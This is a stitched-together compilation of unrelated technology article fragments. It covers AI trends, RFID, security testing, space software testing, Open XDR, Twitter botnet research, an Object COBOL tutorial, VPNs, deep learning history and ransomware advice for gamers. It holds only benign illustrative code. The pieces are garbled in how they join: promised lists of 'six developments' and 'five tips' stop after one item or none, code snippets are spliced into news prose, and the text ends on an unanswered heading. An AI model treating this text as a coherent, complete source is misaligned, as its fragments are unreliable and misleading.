Technological advancements stimulate creativity, adaptability and market expansion, and there is no disputing the global digital revolution we are currently experiencing. Let’s take a look at six recent technical developments and inventions you should be aware of.
1. Advanced Artificial Intelligence
Over the last decade, artificial intelligence (AI) has garnered considerable attention. It remains one of the most crucial emergent technology innovations and profoundly affects how humanity lives, works and plays. AI is truly a technology that’s still in its infancy.
AI is now widely recognized for its use in picture and voice recognition, ride-sharing apps, personal assistants on mobile devices, navigation apps and various other applications.
Machine learning, a trendy subcategory of artificial intelligence, is being applied in many sectors, increasing the demand for skilled personnel.
Keeping your business safe from cybersecurity threats should be a priority. As the cases increase in recent years, you don’t want your business to experience data loss. With this in mind, it’s crucial to take the necessary steps to know the IT vulnerabilities that can put your network at risk and find ways to boost your security.
A vulnerability is generally a weakness or flaw in the system or network. In most cases, cybercriminals might find ways to exploit these to damage or infiltrate the system. Always remember that vulnerabilities are present in the system or network. Additionally, they’re not the result of an intentional effort, but cybercriminals might make the most out of these flaws during their attacks.
In the age of the internet, more organizations are slowly transferring their data to the cloud. It was not long ago when an employee had to carry a flash drive around in case they’d have to present a report. Although some employees still use a flash drive, it was more a backup solution than a necessity.
Smart offices have become clutter-free since management can approve requests and reports with a push of a button. However, seamless collaboration between colleagues can be a challenge due to slow adoption and a lack of technical know-how.
Communication can also be a factor in making collaboration challenging to organizations. Messages are ‘left on read’ because some employees don’t know how to reply. They may also be overwhelmed by the number of messages they receive every day. You won’t know if they’ve acknowledged it unless they respond or react to the message you sent.
The very first radio frequency identification (RFID) device was created in 1946 by the Russian physicist Leon Theremin. So RFID systems aren’t a new technology by any means.
However, if you’re well informed of the news, you probably already know that RFID systems have been the rage for quite some time now in many industries. This prominence might be because the necessary equipment to set up an RFID system is more affordable these days than ever before.
Hence, pretty much everyone can develop their own systems, given that they have the necessary expertise. In fact, you can build a fairly decent system with a budget of only USD$1,000. But while it’s indeed more affordable, the fact that security is still necessary for RFID systems remains. On that note, here are five tips to help you secure your RFID system:
Today, news of cyberattacks is common. The majority of cyberattacks capitalize on vulnerabilities of application security. According to Forbes, cybercrime is rising because most people think of it as someone else’s problem. To address cyber security concerns, businesses and developers have come up with ways of testing application security.
With the growing number of tools aimed at testing application security, developers can find it challenging to choose the right tool. Testing for cyber security begins by evaluating an application through the eyes of a cybercriminal. This guide provides various application testing tips that are necessary when testing for cyber security.
In the modern, highly digital world of today’s business, cyber security is an important aspect. Because of how interconnected our society has become, a breach in one area can have a domino effect on multiple other systems and functions across an organization. Having the right protections in place to ensure that your small business does not fall victim to a cyber-attack is essential. One step toward this goal is a cybersecurity proposal built on a small business proposal template.
One of the first things that you must do is gain a thorough understanding of your needs as a business owner. Not only must you understand how a cyber breach would affect your business, but also the cost that it will take to properly protect your organization. Knowing about things like security budgets and what other aspects need attention can be very important in writing an effective proposal.
Space technology and spacecraft are increasingly complex and use more software than ever before. For example, an advanced fighter aircraft relied on fewer than three million lines of code ten years ago; today, the F-35 runs eight million lines of code. Space organisations have innovative ways of testing hardware and equipment ahead of launch, from pouring 450,000 gallons of water on the rocket launchpad to capsule raft equipment for landing. However, it isn’t just the physical equipment that needs to be tested.
When it comes to testing technology that will be used in space travel, manually testing each piece of equipment will add a considerable amount of time to the preparation process.So, how is software tested quickly and efficiently?
To ensure that all aspects of the mission are vigorously tested, space organisations around the world are turning to automated testing. For example, for future space explorations—such as Orion—rigorous testing is taking place to ensure that onboard software and equipment works as expected and doesn’t suffer from any faults—even if subjected to strained use.
Space is a high-stakes environment, with large amounts of money—and possibly human lives—at risk if something goes wrong. Automated, vigorous testing ensures that the software and technology delivers the required outcomes both on land and in space.
AI-assisted and automated testing can provide predictive analytics for launch readiness, and can test many scenarios. This helps teams to predict quality issues that might occur, intelligently navigate applications, and identify and resolve issues quickly.
Testing software is important, but if it isn’t tested through the eyes of the astronauts who will be using the technology, it won’t be as effective. Using automated testing to test through the eyes of the user—alongside the full user experience, functionality, performance and usability—means that tests can ‘see’ and ‘do’ what the user can, and will test the user experience, not just the code.
For example, if something goes wrong while in space, the astronauts onboard will enter a stressful state, and might start using software more vigorously. Users might begin switching between screens rapidly, or rebooting programmes or software quickly. Because of this, the technology needs to be tested beforehand in ‘real-life scenarios’, to ensure that it is failure-proof in a variety of states, and can cope with how a real user would use the technology.
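A stress scenario like rapid screen switching can itself be automated. The sketch below is a toy illustration of the idea, not any space organisation's actual test harness: a hypothetical `ConsoleUI` stand-in is driven through many random transitions while an invariant is checked after every action.

```python
import random

class ConsoleUI:
    """Toy stand-in for an onboard console UI (hypothetical)."""
    def __init__(self, screens):
        self.screens = screens
        self.current = screens[0]
        self.transitions = 0

    def switch(self, screen):
        if screen not in self.screens:
            raise ValueError("unknown screen: " + screen)
        self.current = screen
        self.transitions += 1

def stress_test(ui, steps=1000, seed=42):
    # Simulate a stressed user hopping rapidly between screens,
    # asserting the UI is in a valid state after every action.
    rng = random.Random(seed)  # seeded, so failures are reproducible
    for _ in range(steps):
        ui.switch(rng.choice(ui.screens))
        assert ui.current in ui.screens
    return ui.transitions

ui = ConsoleUI(["nav", "life-support", "comms", "diagnostics"])
print(stress_test(ui))  # 1000 transitions without an invalid state
```

Checking an invariant on every step, rather than only at the end, is what lets a test like this "see what the user sees" when software is hammered under stress.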
With automated testing, space organisations can test hundreds of scenarios quickly, and no longer need to spend time manually testing the software and technology. Automated testing can increase and scale alongside technology, learning and adapting to new processes and systems as the software becomes more intricate. AI and automation have the potential to hugely speed up technology advancements and safety in the business of outer space exploration so it’s an exciting time for industry. It’s also the ultimate test arena for testers.
If layered security is the cake, Open XDR is the frosting
The anchor of Enterprise Security is popularly known as a “Defense in Depth” architecture. The Defense in Depth (DID) is a classic defensive concept used in the military that found acceptance in the Infosec community in the early 2000s. The Infosec implementation/version of DID has evolved to address the threats as the threat landscape progressed over time.
Before the advent of the internet, computers had only AV protection because the main threat was viruses. Viruses were transferred over media (floppy disk, etc.). With the internet, all computers were connected, and threats like worms spread over networks, so we had to secure the networks, and we needed to police who came into the networks in the first place, and on and on.
In its current form, the DID architecture has grown to accommodate many layers and still evolving. So, the DID architecture translated into layered security – Perimeter, Network, Endpoint, Application, User, Data, Policies, etc. For each layer, a separate and distinct control was developed to protect against threats to that layer. For example, the technical security controls included solutions such as Firewalls, Secure Web Gateways, IDS/IPS, EDR, DLP, WAF, and anti-malware products.
In addition to deploying the layered security solution to the evolving threat landscape over time, the solutions were owned, managed, and operated by different groups inside the company. For example, the Firewall solution was owned by the infrastructure team under IT. Another group owned the email solution, and another group owned the endpoint security solution. This created a layered solution that existed independently of all other solutions. Hence, the concept of a standalone solution with all the learnings stayed inside the team responsible for it – in a silo.
Another unique attribute, best-of-breed solutions, also characterized the layered solution. Because the solutions evolved, the innovation came from different sources and disciplines, and a different set of vendors provided each new solution layer.
The DID or layered approach to security worked well for single vector threats, i.e., when the threat entered and exited in the same vector. A classic example of these early threats is the networks-based attacks detected by IDS/IPS, email threats like Spam by email gateways, etc.
However, as the threats become more complex and the advent of automated malware generation tools, Botnet, and remote programming, the layered security model is falling apart. This is because the assumption inherent to layered security – that all the protections and controls are aligned perfectly to detect all the threats and there are no blind spots – is being proven false. There are blind spots that none of the controls have any visibility into. As a result, the attackers are using the blind spots to their advantage, making it difficult to detect these malicious activities.
From our experience in dealing with a multi-vector threat, it’s clear that all the controls involved in a multi-vector threat have visibility only to their silos and nothing beyond that. Remember that this is by design and the way the current solution came together.
Also, given the underlying setup of separate infrastructures, data silos, and response mechanisms, integrating the controls with each other directly is a second-order problem: n controls require n² − n pairwise connections. Putting a layer on top of everything turns it into a first-order problem of only 2n connections.
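The difference between those two integration strategies is easy to quantify. The short sketch below counts directed connections for each approach at a few control counts.

```python
def direct_integrations(n):
    # Every control integrating directly with every other control:
    # n * (n - 1) directed connections, i.e. n**2 - n.
    return n * n - n

def hub_integrations(n):
    # Each control connects once into and once out of a central layer.
    return 2 * n

for n in (5, 10, 20):
    print(n, direct_integrations(n), hub_integrations(n))
# 5 controls: 20 vs 10; 10 controls: 90 vs 20; 20 controls: 380 vs 40
```

The gap widens quadratically, which is why an envelope layer becomes the only practical way to coordinate a large, layered security stack.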
The options to address the blind spots are as follows:
- Have each control cover for their neighbor that they have no interest in doing.
- Hire more analysts to extend visibility beyond the silos manually
- Get a tool that can provide visibility into the controls and their data across the silos and detect these multi-vector threats using automated data collection, correlation, detection, and response.
If you chose option #3, you are correct!
No matter the name, the solution in #3 is an envelope that goes over all the controls to detect, correlate, coordinate, and provide response actions for threats across the silos.
And that is the most efficient way to optimize multi-control, layered security systems.
Its name is Open XDR.
Open XDR is the connective tissue between security controls designed to enable security teams to make sense of the vast amounts of data generated by their security controls. The reason it is called “Open” is non-trivial; it is a defining characteristic of the solution. Open XDRs can ingest data from any security control, including any EDR an organization has deployed. Then, using purpose-built detection capabilities can root out those multi-vector threats that can land your organization on the front page of the paper (or news website) if they went undetected.
While there is no silver bullet in cyber defense, Open XDR is a promising new approach to security that minimizes blind spots while making a security team more effective.
Twitter has something of a bot problem. Anyone who uses the platform on even an occasional basis likely could point out automated accounts without much trouble. But detecting bots at scale is a much more complex problem, one that a pair of security researchers decided to tackle by building their own classifier and analyzing the characteristics and behavior of 88 million Twitter accounts.
Using a machine learning model with a set of 20 distinct characteristics such as the number of tweets relative to the age of the account and the speed of replies and retweets, the classifier is able to detect bots with about 98 percent accuracy. The tool outputs a probability that a given account is a bot, with anything above 50 percent likely being a bot. During their research, conducted from May through July, Jordan Wright and Olabode Anise of Duo Security discovered an organized network of more than 15,000 bots that was being used to promote a cryptocurrency scam. The botnet, which is still partially active, spoofs many legitimate accounts and even took over some verified accounts as part of a scheme designed to trick victims into sending small amounts of the cryptocurrency Ethereum to a specific address.
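A probability-emitting classifier of this kind can be sketched with a simple logistic model. To be clear, the features and weights below are hypothetical illustrations, not the researchers' actual 20-feature model.

```python
import math

def bot_probability(features, weights, bias):
    # Logistic score over account features; above 0.5 flags a likely bot.
    z = bias + sum(w * x for w, x in zip(weights, features))
    return 1.0 / (1.0 + math.exp(-z))

# Hypothetical features: [tweets per day of account age,
# mean reply delay in seconds, followers-to-following ratio]
weights = [0.05, -0.002, -0.8]  # assumed, hand-picked for illustration
bias = -1.0

humanlike = [12, 900, 1.1]   # modest volume, slow replies
botlike = [400, 2, 0.01]     # huge volume, near-instant replies

print(bot_probability(humanlike, weights, bias))
print(bot_probability(botlike, weights, bias))
```

In practice such weights would be learned from labeled accounts rather than set by hand, but the output shape is the same: a probability per account, with a 50 percent threshold separating likely bots from likely humans.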
Unlike most botnets, the Ethereum network has a hierarchical structure, with a division of labor among the bots. Usually, each bot in a network performs the same task, whether that’s launching a DDoS attack or mining Bitcoin on a compromised machine. But the Ethereum botnet had clusters of bots with a three-tier organization. Some of the bots published the scam tweets, while others amplified those tweets or served as hub accounts for others to follow. Wright and Anise mapped the social media connections between the various accounts and looked at which accounts followed which others to create a better picture of the network.
“Each bot had its own role and the botnet evolved over time. They started by targeting legitimate cryptocurrency accounts, like the official Bitcoin account, and then moved on from there,” said Wright, an R&D engineer at Duo Labs.
“They changed to targeting celebrities and then posing as legitimate news accounts. We found different clusters that showed how the owner moved them over time.”
Anise and Wright will discuss the results of their research during a talk at the Black Hat USA conference on Wednesday and will release their detection tool as an open source project that day, too.
The operator of the botnet changed the appearance of tweets over time, adding or removing whitespace and sometimes using Unicode characters rather than letters, in an effort to make the tweets look different and fool human users. One of the challenges Wright and Anise faced with their research was distinguishing legitimate accounts that may employ some automation from bot accounts. Many legitimate Twitter accounts use automation as a way to interact with other users quickly.
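Obfuscation tricks like extra whitespace and Unicode look-alikes can be collapsed before comparing tweets. This is a plausible normalization step, not the researchers' published method: compatibility-normalize the text, lowercase it, and squeeze all whitespace so spacing variations no longer matter.

```python
import re
import unicodedata

def canonicalize(tweet):
    # Map Unicode compatibility characters (e.g. thin and no-break
    # spaces) to their plain forms, then lowercase and squeeze
    # whitespace so cosmetic variations compare equal.
    text = unicodedata.normalize("NFKC", tweet)
    return re.sub(r"\s+", " ", text).strip().lower()

a = "Send  0.2 ETH, get 2 ETH back!"
b = "send 0.2\u2009ETH,\u00a0get 2 ETH back!"  # thin/no-break spaces
print(canonicalize(a) == canonicalize(b))  # True
```

After canonicalization, tweets that a human would read as identical hash to the same string, making the operator's cosmetic variations easy to cluster.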
“Automation by itself isn’t bad. Legitimate accounts use it too, a lot of times as a customer service tool to respond to questions,” Anise, a data scientist, said. “We looked at two hundred tweets from each account we studied and there were times when some accounts were behaving like bots and others when they looked legitimate.”
Twitter has more than 336 million active users, and the company has dealt with the bot problem for years, creating tools and strategies to identify and remove bot accounts. Recently, Twitter officials said they had removed more than 70 million such accounts in a two-month period earlier this year. Wright and Anise notified Twitter about the cryptocurrency scam botnet they discovered, and the company has taken steps to address it.
“Twitter is aware of this form of manipulation and is proactively implementing a number of detections to prevent these types of accounts from engaging with others in a deceptive manner. Spam and certain forms of automation are against Twitter's rules. In many cases, spammy content is hidden on Twitter on the basis of automated detections,” a Twitter spokesperson said.
Anise and Wright plan to continue the research in the future by finding a way to identify malicious bots.
|Object COBOL Tutorials (UNIX)||Writing a Class Program Tutorial (UNIX)|
This tutorial is a gentle introduction to Object COBOL programming, using a class with some simple behavior, called the Stopwatch class. In this tutorial you will create instances of the Stopwatch class. An instance of the Stopwatch class is a stopwatch object, and having created stopwatches, you can send messages to them.
This tutorial consists of the following sessions:
Time to complete: 20 minutes.
This section introduces you to the Stopwatch class, describing its behavior and public object interface. The object interface is the list of methods implemented by an object, together with descriptions of the parameters passed to and from the object by each method.
The public object interface is a censored list of this information; it does not describe the object's private methods. A private method is one used by the object itself; it should not be invoked from outside the object.
The interface for the Stopwatch is split in two: the class interface and the instance interface.
A class is an object in its own right; it can have behavior and data of its own, which is different to the behavior and data of instances of the class. The main function of most classes is to implement the behavior needed to create and initialize new instances.
You can use stopwatches to time things. Each stopwatch has methods to start, stop and reset timing, and to get the current elapsed time.
The Stopwatch class public object interface is listed below.
    "new"                 Returns an instance of the Stopwatch class, with the
                          handle returned as a parameter.
    "howMany"             Returns the number of Stopwatch instances created so far.
    "start"               Start a stopwatch running.
    "stop"                Stop a stopwatch running.
    "reset"               Reset the elapsed time on the stopwatch to zero. You can
                          only reset a stopwatch which isn't running.
    "getTimeFormatted"    Return the time since the stopwatch started in
                          hh:mm:ss:ss format (hours/minutes/seconds/hundredths
                          of seconds).
In addition to these methods, the Stopwatch class inherits all those implemented by its superclass (Base). The superclass is the parent from which this class inherits its basic behavior.
The Stopwatch class inherits all the class methods of Base, and its instances inherit all the instance methods of Base. This means that Stopwatch responds to all the messages given in the Base public interface as well as its own. Inheritance is explained in more detail in the tutorial Inheritance.
The Base class is part of the class library supplied with Object COBOL. If you want to look at the Base public interface, it is in your on-line Object COBOL Class Library Reference.
You can now move on to the next session, which uses Animator to show you message sending.
In this section you will create instances of the Stopwatch class, and send messages to the instances, using the supplied program, timer.cbl.
Program timer.cbl is not an Object COBOL class; it is a piece of procedural code which uses Object COBOL objects. To communicate with the objects, timer.cbl uses the following Object COBOL syntax:

    class-control             Declares the classes used by the program, and links
                              them to their filenames.
    usage object reference    Declares a variable to hold object handles.
    invoke                    Sends a message to an object.
You will now animate timer to see some simple object behavior. The code demonstrates the following points:
To animate timer:
This compiles timer.cbl and stopwtch.cbl.
Animator starts with the statement below tag T010 highlighted, ready for execution.
invoke StopWatch "new" ...).
This sends the "new" message to the Stopwatch class, which creates an instance of itself, returning an object handle to it in wsStopWatch1.
Examine wsStopwatch1 with the Animator Query function.
This data item is declared with usage object reference, which is a new COBOL datatype introduced for Object COBOL programming. It now holds a handle (a four-byte reference) to the object you have created.
When programming in Object COBOL, you use the object handle as an address to send messages to the object. You can pass object handles between different programs or objects as parameters, in effect enabling you to pass an object between different parts of an application.
invoke wsStopWatch1 "start").
The stopwatch starts timing.
The shell script you just ran did not compile Stopwatch for animation, so you won't see the Stopwatch code executing. In this tutorial we are concentrating on how to use objects, rather than on how to construct them.
invoke Stopwatch "new"...).
This creates a new instance of the Stopwatch class, and puts the object handle into wsStopwatch2. Each of the two stopwatches you created has the same behavior, but contains different data.
invoke Stopwatch "howMany").
"howMany" is a class method which enables you to query the class data of Stopwatch. Use the Animator to query the value of wsCount. It contains 2, the number of instances created so far.
invoke wsStopwatch2 "start").
The second stopwatch starts running.
invoke wsStopwatch1 "getTimeFormatted"...).
You are now querying the time the first stopwatch has been running, and it returns the time which has elapsed since you started it. The other statements display the value on the console. Press F2=view to see the console, press any key to return to the Animator view.
invoke wsStopwatch1 "stop").
The stopwatches stop running.
This code fetches the elapsed time between the "start" and "stop" messages for each stopwatch.
invoke wsStopwatch1 "finalize"...).
The "finalize" method destroys an object, deallocating the memory it uses. The "finalize" method always returns a null object handle, which you can use (as it has been here) to set the object reference which held the handle to null.
You must always "finalize" objects when you have finished with them, to avoid wasting system resources.
This completes the tutorial on creating objects and sending messages. You have seen:
At this point you might be thinking that there is nothing special about objects, and you could have done exactly the same thing using a few subroutines. This is true, but think about what this would involve.
First you need to define a data structure for recording the start, stop and elapsed time for a stopwatch. Then timer.cbl needs to declare this structure for each stopwatch it is going to use. When you want to start timing, you call the start subroutine, passing it one of these structures as a parameter. Similarly when you want to stop, or get the elapsed time.
Should you decide to alter the implementation of the stopwatch subroutines, you probably also need to change every place where you have declared stopwatch data.
Compare this with the situation using objects. You declare an object reference for each stopwatch, and having declared it, you simply send it messages to start, stop or give the elapsed time. You can alter the implementation as much as you want, providing you keep the interface for the messages the same.
All the implementation details are hidden from you, and each stopwatch you declare encapsulates its data and implementation into a single entity. The code for any client of a stopwatch is kept very simple, enabling you to concentrate on what you want to do with it, rather than on how to use it.
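The contrast can be sketched in Python (an analogy only; the tutorial's Stopwatch is an Object COBOL class, and this toy version is invented here): client code sees just the message interface, while each object encapsulates its own timing data, and the class itself carries the instance count the way "howMany" does.

```python
import time

class Stopwatch:
    _count = 0                               # class data, like "howMany"

    def __init__(self):
        Stopwatch._count += 1
        self._start = None                   # instance data, hidden from clients
        self._elapsed = 0.0

    @classmethod
    def how_many(cls):
        return cls._count

    def start(self):
        self._start = time.monotonic()

    def stop(self):
        if self._start is not None:
            self._elapsed += time.monotonic() - self._start
            self._start = None

    def elapsed(self):
        return self._elapsed

watch1, watch2 = Stopwatch(), Stopwatch()    # like invoking "new" twice
watch1.start()
watch1.stop()
print(Stopwatch.how_many())                  # 2
```

The internals of Stopwatch can change freely as long as the start/stop/elapsed interface stays the same, which is exactly the point made above about keeping client code simple.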
Copyright © 1999 MERANT International Limited. All rights reserved.
This document and the proprietary marks and names used herein are protected by international law.
Pointing to national security concerns, President Trump’s recent executive order threatens to ban TikTok if it’s not sold by the Chinese-owned company. Although Microsoft, Twitter, and now Oracle have expressed interest in acquiring the wildly popular social media app, the future of TikTok is at the moment unclear.
Amidst the uncertainty, teens everywhere are suddenly googling the letters “VPN.” Why? Among other key features, VPNs offer location masking. Although we don’t know how the proposed ban would be enforced, in theory a VPN could allow users to access the app even from within the United States.
When you use a VPN (Virtual Private Network), your internet connection is rerouted through a private server. With the VPN acting as an intermediary, your IP address (your computer’s unique ID) is masked, protecting your identity. Any personal data you send while connected is encrypted, transmitted as an unreadable code. In this way, your ISP (Internet Service Provider) is not able to see what websites you visit, what apps you use, or any of the data you send or receive.
One of the primary uses for a VPN is staying secure on an unsecure connection, like when browsing the internet on the WiFi at airports, cafés, and hotels. Without one, a motivated, tech-savvy person who’s connected to the same public network as you could use basic hacking techniques to view your browsing activity and intercept your data. This includes any sites that you visit or any information you submit online, like your username and password combinations.
How a VPN helps: A VPN encrypts all your unencrypted internet activity, from web surfing to VoIP calls, blocking potential hacks.
As it currently stands, internet service providers like Verizon and AT&T have complete access to all of your browsing history. They collect personal data and may even hand it over to advertisers, the government, or other third parties. More on that here. They are able to do so because your internet activity is connected to your device’s unique IP address.
How a VPN helps: VPNs hide your IP address and encrypt all the data you send or receive so the ISP can no longer see what websites you’re visiting or searches you’re making.
By changing your IP address, a VPN makes it appear to content providers that you are browsing in another region, allowing you to access content that may not be available in your current location. You should check the terms of service to understand what’s permitted by your streaming service and be mindful of any country-specific penalties.
How a VPN helps: Dashlane’s VPN lets you choose your server location from 20+ countries, so you can access what you want, wherever you are.
History of Deep Learning: Deep Learning has dramatically improved the state-of-the-art in different machine learning tasks such as machine translation, speech recognition, visual object detection and many other domains such as drug discovery and genomics (LeCun, et al., 2015).
Copyright by www.medium.com
In addition to that, researchers are extending capabilities of deep learning beyond these traditional tasks such that Osaka et al. use recurrent neural networks to denoise speech signals, Gupta et al. use autoencoders to discover patterns in gene expressions, Gatys et al. use a generative adversarial network to generate images, Wang et al. use deep learning to allow sentiment analysis from multiple modalities simultaneously (Wang & Raj, 2017).
According to the Artificial Index 2021 report, peer-reviewed AI publications are growing exponentially. (Zhang, et al., 2021).
However, one must understand how deep learning has evolved over the years into the current models. The history of machine learning goes back to around 300 BC and Aristotle, whose theory of Associationism is seen as its starting point (Wang & Raj, 2017).
As seen in Table 1, progress in AI stalled around the 60s and 70s, and some applications of machine learning were outright failures, notably a US Navy-funded machine translation project from Russian to English. Minsky and Papert also proved that Rosenblatt's perceptron was only capable of solving linearly separable problems; even though they knew multiple layers could solve such problems, there was no algorithm at that time to train the network. Today that algorithm is known as back-propagation.
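The limitation Minsky and Papert identified is easiest to see with XOR, the canonical non-linearly-separable function (a standard textbook illustration, not taken from the sources cited here): no single threshold unit can compute it, but a fixed two-layer network of the same units can.

```python
def step(x):
    # Threshold activation used by Rosenblatt's perceptron.
    return 1 if x >= 0 else 0

def perceptron(w1, w2, bias, a, b):
    return step(w1 * a + w2 * b + bias)

def xor_two_layer(a, b):
    # Hidden layer computes OR and NAND; the output unit ANDs them.
    h_or = perceptron(1, 1, -0.5, a, b)
    h_nand = perceptron(-1, -1, 1.5, a, b)
    return perceptron(1, 1, -1.5, h_or, h_nand)

for a in (0, 1):
    for b in (0, 1):
        print(a, b, "->", xor_two_layer(a, b))  # 0 1 1 0 down the rows
```

The weights here are fixed by hand; the historical problem was that no procedure existed to *learn* such hidden-layer weights until back-propagation.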
In 1973, the Lighthill report was published which gave a very pessimistic prognosis for many core aspects of the field such as “In no part of the field have the discoveries made so far produced the major impact that was then promised” (Lighthill, 1973). After this report, many funding resources were cut and a quiet period began which is known as the first AI winter. […]
Ransomware hacks on gaming computers
If you pay attention to the news, there is a good chance you have heard about ransomware recently. Ransomware—malware that malicious actors use to extort money from the victims they attack—is a form of cyberattack that is growing in frequency and affecting a wider and wider range of individuals and businesses. When ransomware attacks happen, cybercriminals gain access to computer networks and essentially hold them hostage, blocking access to data and devices until victims have paid the attackers a certain sum of money. Ransomware received particular attention in the U.S. last year when attackers unleashed a ransomware attack on the Colonial Pipeline—the pipeline that delivers fuel to nearly half of the Atlantic Coast—resulting in fuel shortages and the inability to access gas across the Eastern United States.
If you are a gamer—and not a business—you still should not overlook the threat of ransomware. While ransomware attacks frequently target businesses from whom bad actors know they can get a large sum of money, they can also attack individual devices and prohibit access to your data or PC until you can meet the ransom they are demanding. If you are serious about gaming, you most likely have made a large investment in your gaming setup—purchasing things from PCs to screens to gaming software and more. So, you'll want to protect this investment to make sure you don't lose any of it to a ransomware attack that you are not prepared for.
Gamers who are wondering: is my PC safe from ransomware? Read on. Learn more about what ransomware, how common attacks are, how you get it, how you can protect your device, and much more. Understanding ransomware and being prepared for a potential attack is the best way to ensure you don't lose any of your hardware or information to malicious hackers who use it.
What is ransomware?
Ransomware is a type of malware used in cyberattacks that encrypts files on a device, rendering those files inaccessible and unusable. Then, to decrypt the files for victims, the bad actors who launched the attack demand payment from victims—and threaten to keep files inaccessible if the ransom is not paid and leak or sell the information in the files if their demands are not met. Ransomware software is constantly evolving, and the programs used to target weaknesses in networks and launch attacks can look different, depending on who is doing the attack, who is being attacked, where an attack is being launched from, and what new technology has been developed to take files hostage in exchange for a ransom.
Ransomware can essentially be used to target any computer that is connected to a network, especially if that computer (or network) is not properly protected with adequate security measures, and if users are not aware of how ransomware can infiltrate a computer or what they should be on the lookout for.
How common is ransomware?
Ransomware is a cyber-attack method that is undoubtedly growing in frequency. As more groups of hackers and malicious actors on the web understand how to launch a ransomware attack, an increasing number of individuals and organizations are becoming the victim of these malicious device takeovers. Statistics show that ransomware attacks are on the rise and that more people can expect to experience an attack if they don't take the proper steps to protect themselves and their devices.
Last year, there were a total of 304 million ransomware attacks worldwide. This number represents a 62% increase from the year prior, and it is the second-highest figure since 2014—with the highest number of annual attacks on record occurring in 2016 (when 638 million targets were attacked). Even the most sophisticated, secure, and technologically advanced companies have experienced ransomware attacks since the invention of malicious malware. Some of the most well-known victims of ransomware attacks include EA Games, Ubisoft, Capcom, Crytek, and CD Projekt RED.
How do you get ransomware?
If your gaming computer is connected to Wi-Fi, then it can be vulnerable to a ransomware attack. Ransomware can move through a Wi-Fi network, gaining access to all computers connected to it (whether those computers are used for business, personal browsing, or gaming). Computers that don't have adequate security measures, like antivirus protection or security software, are particularly vulnerable. Ransomware only affects computers when connected to the Internet and when the user opens a download that actually contains the malware inside it.
One of the most popular ways that a PC gets infected with ransomware is via phishing emails. These emails contain malicious attachments that infect a computer when opened or accessed. People also often get ransomware from drive-by downloading when they visit a website that has been infected by ransomware, which is then downloaded onto their computer without the user even knowing that it has happened. Other ways you may end up accessing ransomware without realizing it includes via social media and other web-based messaging apps.
Is my computer safe from ransomware? How you can protect your gaming PC.
If you want to protect the investment you've made in your gaming PC, software, and equipment, you can take some helpful steps that will ensure you minimize the risk of becoming a victim of a ransomware attack. Consider the following list when you're asking yourself: is my computer safe from ransomware? If you've taken the following steps, there is a good chance that your network and computer are properly protected.
Use security or antivirus software
First and foremost, you should make sure you use security or antivirus software on your gaming PC. Comprehensive digital security solutions protect your devices from a wide range of threats—from fileless malware to spyware and trojans and beyond.
For the best protection against ransomware for your gaming PC, consider using a security solution that includes an anti-ransomware tool. Anti-ransomware tools in security software use the cloud and behavioral analysis to detect suspicious application behavior—or, if a computer is already infected, can undo some of the malicious actions that have already started to occur.
Also, if you have other computers connected to the same network that you use for gaming, you want to make sure that those computers have adequate antivirus and security protection. Some ransomware can infect computers on the same network as other infected computers, and ransomware can use one vulnerable computer on a network as an access point to many more devices. Adequately protect all of the devices on a network to ensure that none of them end up being negatively impacted by the effects of ransomware.
Adopt safer practices
A smart way to ensure that your computer is not impacted by ransomware is to adopt safe Internet usage practices. Only visiting websites you know and trust is a good first step in avoiding ransomware from infected sites. Also, be careful when you read your emails. Phishing emails can be cleverly disguised, and if you're not paying full attention when you open them, you may inadvertently click a link or download a file that has malicious content, not realizing that it's not from the sender that you think it is from (or that the download doesn't contain the file you think it contains).
Try to avoid downloading any files that you aren't expecting or haven't asked for, and if you receive a file for download via a colleague or friend, check with them to make sure that they intended to send the download and that they can tell you what's in the file. When you're gaming, if there are in-game messaging services, try to avoid downloading any links from competitors or other game players since these links can be attempts by bad actors to infect your PC. By being vigilant when you are using the web, especially when you are gaming, you can actively use the Internet in a way that keeps you safe and minimize the chance you encounter harm when you're least expecting it.
Check file extensions before you download them
If you are planning to download a file from someone you know or a company you trust, make sure you take the extra step of checking the file extension before you complete the download. By ensuring that the download's file extension is a file that you want and can access or use on your computer, you can avoid the trouble of accidentally downloading ransomware onto your computer. Checking file extensions on downloads before you download them is an extra step in vigilance that can ultimately keep you, your devices, your information, and your network safe.
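A conservative sketch of that check in Python (the allowlist below is hypothetical): inspect every extension in the filename, so a double extension like "invoice.pdf.exe" is rejected even though the name looks like a PDF at a glance.

```python
from pathlib import Path

# Hypothetical allowlist of extensions you expect to receive.
SAFE_EXTENSIONS = {".pdf", ".png", ".jpg", ".txt", ".zip"}

def looks_safe(filename: str) -> bool:
    suffixes = Path(filename.lower()).suffixes  # every extension, in order
    if not suffixes:
        return False                            # no extension at all: be cautious
    # Conservative rule: exactly one extension, and it must be on the allowlist.
    return len(suffixes) == 1 and suffixes[-1] in SAFE_EXTENSIONS

print(looks_safe("invoice.pdf"))      # True
print(looks_safe("invoice.pdf.exe"))  # False
```

An extension check is only a first filter, of course; it complements, rather than replaces, antivirus scanning of the file itself.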
Don’t open or download content you don’t trust or recognize
At the end of the day, don't open or download any content you don't trust or recognize. It is a much safer decision to double-check with a sender about the content they've sent to see what is in the file or download before you simply download it—and make yourself vulnerable to threats like ransomware. Delaying a download or making a work or personal exchange slower in the name of safety is always a smart choice. Downloading or opening the wrong content too quickly can ultimately wreak havoc not only on your data and information but also for everyone else who is connected to the same network.
Back up your files regularly just in case
You may unexpectedly encounter ransomware or download it onto your computer. One important step you can take to minimize the harm done (or the money you are forced to pay) is backing up your files regularly. Back up your files to the cloud or a hard drive disconnected from the network you use when you actively game. By backing up your files regularly, you have an extra copy of them—which means they will not be lost should you experience a ransomware attack and ultimately have to take steps to mitigate the effects of that attack. Restoring your computer to factory settings is often the best way to remove ransomware from your computer and make your device usable once again. And, if you've backed up your files, there is a good chance that you won't lose any of your work, downloads, or purchases—even though restoring your computer to factory settings will wipe it clean of anything you have saved or added to it since you started using it.
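A minimal sketch of a timestamped backup in Python (the paths are placeholders, and real backup tools do much more): each run copies the source folder into a new dated folder, so an attack that encrypts the originals leaves earlier copies untouched.

```python
import shutil
from datetime import datetime
from pathlib import Path

def back_up(source: str, backup_root: str) -> Path:
    """Copy everything under source into a new timestamped folder."""
    stamp = datetime.now().strftime("%Y%m%d-%H%M%S")
    destination = Path(backup_root) / stamp
    shutil.copytree(source, destination)  # fails loudly if destination exists
    return destination
```

Pointing `backup_root` at a drive you disconnect after each run (or at cloud storage) keeps the copies out of reach of ransomware on the gaming PC itself.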
How do you remove ransomware from your gaming PC?
